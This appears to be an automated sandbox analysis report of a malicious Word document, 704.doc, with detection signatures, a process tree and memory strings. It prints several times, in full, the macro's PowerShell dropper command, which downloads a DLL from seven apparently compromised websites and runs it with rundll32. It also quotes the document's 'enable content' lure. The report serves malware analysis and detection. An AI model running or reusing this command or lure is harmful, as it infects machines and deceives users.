
Windows Analysis Report 704.doc

Overview

General Information

Sample Name: 704.doc
Analysis ID: 526268
MD5: 40f85d07da2533d576b1f2d7c043a2da
SHA1: 60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256: d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1220 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2420 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2776 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP
Rule: SUSP_VBA_FileSystem_Access
Description: Detects suspicious VBA that writes to disk and is activated on document open
Author: Florian Roth
Strings:
  • 0xafc8:$s1: \Common Files\Microsoft Shared\
  • 0xb320:$s1: \Common Files\Microsoft Shared\
  • 0x4447:$s2: Scripting.FileSystemObject
  • 0x557e:$a1: Document_Open
  • 0xa5e7:$a1: Document_Open
  • 0xb9f6:$a1: Document_Open
  • 0xd114:$a1: Document_Open

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2420
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started, Author: James Pemberton / @4A616D6573, Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2420
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2420, ProcessCommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebReques

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://ckfoods.net/wp-admin/wPInm2rgMu/, Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/, Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/, Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: 704.doc, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp, String found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp, String found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp, String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp, String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp, String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation, OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 704.doc, OLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr, OLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, OLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPED, Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 704.doc, OLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr, OLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, OLE indicator application name: unknown
Source: 704.doc, OLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentation, OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, OLE, VBA macro line: Private Sub Document_Open()
Source: 704.doc, OLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, OLE indicator, VBA macros: true
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ........................#.........n.....................................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....#...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w..../...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w..../...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....;...............:T.k......T...............7.............}..v............0.b.....................~.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....;...............ZU.k....@.................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....G...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....S...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....S...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w...._...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w...._...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....k...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....k...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....w...............:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....w...............ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............
